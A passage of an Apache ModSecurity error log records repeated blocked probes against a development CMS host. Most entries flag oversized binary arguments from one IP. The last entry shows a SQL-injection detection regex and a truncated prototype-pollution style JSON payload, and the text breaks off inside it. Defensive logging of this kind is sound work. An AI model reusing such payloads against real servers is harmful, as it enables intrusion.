ModSecurity: Access denied with code 403 (phase 2). Found 278 byte(s) in ARGS:binary_szeuorti outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "abCSC_MmESTk3DzpxpNVswAAAVc"] [Tue Mar 10 23:50:03.374157 2026] [:error] [pid 8091:tid 8113] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 271 byte(s) in ARGS:binary_kaawlxiz outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "abCSC_MmESTk3DzpxpNVtAAAAVM"] [Tue Mar 10 23:50:03.393944 2026] [:error] [pid 8091:tid 8105] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 234 byte(s) in ARGS:binary_vkyyrcmx outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "abCSC_MmESTk3DzpxpNVtQAAAUs"] [Tue Mar 10 23:50:03.412458 2026] [:error] [pid 8091:tid 8110] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 260 byte(s) in ARGS:binary_hkcdyazk outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "abCSC_MmESTk3DzpxpNVtgAAAVA"] [Tue Mar 10 23:50:03.430652 2026] [:error] [pid 8091:tid 8106] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 264 byte(s) in ARGS:binary_saivrqqn outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "abCSC_MmESTk3DzpxpNVtwAAAUw"] [Tue Mar 10 23:50:03.448921 2026] [:error] [pid 8091:tid 8096] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 253 byte(s) in ARGS:binary_iunaezru outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "abCSC_MmESTk3DzpxpNVuAAAAUI"] [Tue Mar 10 23:50:03.467112 2026] [:error] [pid 8091:tid 8098] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 248 byte(s) in ARGS:binary_tipnauhb outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "abCSC_MmESTk3DzpxpNVuQAAAUQ"] [Tue Mar 10 23:50:03.485266 2026] [:error] [pid 8091:tid 8112] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 274 byte(s) in ARGS:binary_pyhxoyio outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "abCSC_MmESTk3DzpxpNVugAAAVI"] [Tue Mar 10 23:50:03.503599 2026] [:error] [pid 8091:tid 8101] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 249 byte(s) in ARGS:binary_ocaztoxo outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "abCSC_MmESTk3DzpxpNVuwAAAUc"] [Tue Mar 10 23:50:03.522790 2026] [:error] [pid 8091:tid 8100] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 254 byte(s) in ARGS:binary_bvgjcbtl outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "abCSC_MmESTk3DzpxpNVvAAAAUY"] [Tue Mar 10 23:50:03.540963 2026] [:error] [pid 8091:tid 8108] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 244 byte(s) in ARGS:binary_xiihwbaa outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "abCSC_MmESTk3DzpxpNVvQAAAU4"] [Tue Mar 10 23:50:03.559292 2026] [:error] [pid 8091:tid 8095] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 241 byte(s) in ARGS:binary_hfzcanev outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "abCSC_MmESTk3DzpxpNVvgAAAUE"] [Tue Mar 10 23:50:03.577666 2026] [:error] [pid 8091:tid 8118] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 239 byte(s) in ARGS:binary_axnqhops outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "abCSC_MmESTk3DzpxpNVvwAAAVg"] [Tue Mar 10 23:50:03.595897 2026] [:error] [pid 8091:tid 8107] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 240 byte(s) in ARGS:binary_lefnpbjg outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "abCSC_MmESTk3DzpxpNVwAAAAU0"] [Tue Mar 10 23:50:03.614018 2026] [:error] [pid 8091:tid 8094] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 243 byte(s) in ARGS:binary_cwerutox outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "abCSC_MmESTk3DzpxpNVwQAAAUA"] [Tue Mar 10 23:50:03.633338 2026] [:error] [pid 8091:tid 8115] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 281 byte(s) in ARGS:binary_idliodxz outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "abCSC_MmESTk3DzpxpNVwgAAAVU"] [Tue Mar 10 23:50:03.651850 2026] [:error] [pid 8091:tid 8099] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 246 byte(s) in ARGS:binary_fthmkwcs outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "abCSC_MmESTk3DzpxpNVwwAAAUU"] [Tue Mar 10 23:50:03.670959 2026] [:error] [pid 8091:tid 8109] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 252 byte(s) in ARGS:binary_qeamgdri outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "abCSC_MmESTk3DzpxpNVxAAAAU8"] [Tue Mar 10 23:50:03.689531 2026] [:error] [pid 8091:tid 8116] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 261 byte(s) in ARGS:binary_akeerzmt outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "abCSC_MmESTk3DzpxpNVxQAAAVY"] [Tue Mar 10 23:50:03.707823 2026] [:error] [pid 8091:tid 8114] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 243 byte(s) in ARGS:binary_dyqvqwnz outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "abCSC_MmESTk3DzpxpNVxgAAAVQ"] [Tue Mar 10 23:50:03.726119 2026] [:error] [pid 8091:tid 8097] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 246 byte(s) in ARGS:binary_dqemiiwl outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "abCSC_MmESTk3DzpxpNVxwAAAUM"] [Tue Mar 10 23:50:03.744491 2026] [:error] [pid 8091:tid 8103] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 263 byte(s) in ARGS:binary_mpcxhrha outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "abCSC_MmESTk3DzpxpNVyAAAAUk"] [Tue Mar 10 23:50:03.762852 2026] [:error] [pid 8091:tid 8111] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 258 byte(s) in ARGS:binary_ylhswyxt outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "abCSC_MmESTk3DzpxpNVyQAAAVE"] [Tue Mar 10 23:50:03.781101 2026] [:error] [pid 8091:tid 8102] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 231 byte(s) in ARGS:binary_qfnawlxh outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "abCSC_MmESTk3DzpxpNVygAAAUg"] [Tue Mar 10 23:50:03.799105 2026] [:error] [pid 8091:tid 8104] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 247 byte(s) in ARGS:binary_twuonnrv outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "abCSC_MmESTk3DzpxpNVywAAAUo"] [Tue Mar 10 23:50:03.817513 2026] [:error] [pid 8091:tid 8117] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 256 byte(s) in ARGS:binary_llthjuaz outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "abCSC_MmESTk3DzpxpNVzAAAAVc"] [Tue Mar 10 23:50:03.835421 2026] [:error] [pid 8091:tid 8113] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 263 byte(s) in ARGS:binary_msthefhc outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "abCSC_MmESTk3DzpxpNVzQAAAVM"] [Tue Mar 10 23:50:03.853468 2026] [:error] [pid 8091:tid 8105] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 270 byte(s) in ARGS:binary_cwvjnzzs outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "abCSC_MmESTk3DzpxpNVzgAAAUs"] [Tue Mar 10 23:50:03.871379 2026] [:error] [pid 8091:tid 8106] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 269 byte(s) in ARGS:binary_uunurplj outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "abCSC_MmESTk3DzpxpNVzwAAAUw"] [Tue Mar 10 23:50:03.889672 2026] [:error] [pid 8091:tid 8096] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 246 byte(s) in ARGS:binary_xigytvcj outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "abCSC_MmESTk3DzpxpNV0AAAAUI"] [Tue Mar 10 23:50:03.907983 2026] [:error] [pid 8091:tid 8098] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 263 byte(s) in ARGS:binary_irksarpj outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "abCSC_MmESTk3DzpxpNV0QAAAUQ"] [Tue Mar 10 23:50:03.925978 2026] [:error] [pid 8091:tid 8112] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 264 byte(s) in ARGS:binary_akrfgrzn outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "abCSC_MmESTk3DzpxpNV0gAAAVI"] [Tue Mar 10 23:50:03.944096 2026] [:error] [pid 8091:tid 8101] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 280 byte(s) in ARGS:binary_gocsnthp outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "abCSC_MmESTk3DzpxpNV0wAAAUc"] [Tue Mar 10 23:50:03.963347 2026] [:error] [pid 8091:tid 8108] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 264 byte(s) in ARGS:binary_kpuhbdse outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "abCSC_MmESTk3DzpxpNV1AAAAU4"] [Tue Mar 10 23:50:03.981586 2026] [:error] [pid 8091:tid 8095] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 248 byte(s) in ARGS:binary_zxldjrev outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "abCSC_MmESTk3DzpxpNV1QAAAUE"] [Tue Mar 10 23:50:03.999902 2026] [:error] [pid 8091:tid 8118] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 243 byte(s) in ARGS:binary_pzzusjvd outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "abCSC_MmESTk3DzpxpNV1gAAAVg"] [Tue Mar 10 23:50:04.018375 2026] [:error] [pid 8091:tid 8107] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 229 byte(s) in ARGS:binary_xdmretxc outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "abCSDPMmESTk3DzpxpNV1wAAAU0"] [Tue Mar 10 23:50:04.036328 2026] [:error] [pid 8091:tid 8094] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 224 byte(s) in ARGS:binary_vhfpsubk outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "abCSDPMmESTk3DzpxpNV2AAAAUA"] [Tue Mar 10 23:50:04.054557 2026] [:error] [pid 8091:tid 8115] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 281 byte(s) in ARGS:binary_wjalwvkl outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "abCSDPMmESTk3DzpxpNV2QAAAVU"] [Tue Mar 10 23:50:04.230585 2026] [:error] [pid 8091:tid 8099] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 250 byte(s) in ARGS:binary_slvrjquc outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "abCSDPMmESTk3DzpxpNV2gAAAUU"] [Tue Mar 10 23:50:04.248751 2026] [:error] [pid 8091:tid 8114] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 257 byte(s) in ARGS:binary_eguohdkk outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "abCSDPMmESTk3DzpxpNV2wAAAVQ"] [Tue Mar 10 23:50:04.267048 2026] [:error] [pid 8091:tid 8103] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 258 byte(s) in ARGS:binary_cztmfizm outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "abCSDPMmESTk3DzpxpNV3QAAAUk"] [Wed Mar 11 00:26:09.663795 2026] [:error] [pid 8198:tid 8225] [client 54.180.255.94:59326] [client 54.180.255.94] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: 